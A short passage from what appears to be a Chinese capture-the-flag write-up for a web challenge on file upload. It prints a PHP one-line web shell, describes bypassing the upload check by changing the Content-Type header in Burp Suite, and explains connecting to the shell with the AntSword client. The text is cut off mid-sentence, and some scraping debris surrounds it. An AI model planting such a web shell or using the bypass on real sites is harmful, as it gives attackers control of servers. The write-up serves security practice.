i春秋練習——第三屆「百越杯」福建省高校網絡空間安全大賽-web-do you know upload

首先是一個文件上傳,比較基礎。選擇上傳111.php,內容是一句話馬<?php eval($_POST['cmd']);?> php burpsuit抓包修改Content-Type爲image/gif(任一種圖片都行),這類漏洞能夠搭建一個upload-lab本地練一練。數據庫 顯示上傳成功ui  接下來使用蟻劍鏈接,鏈接密碼就是以前一句話寫的cmd,編碼器能夠選default,這題沒啥關係。編
相關文章
相關標籤/搜索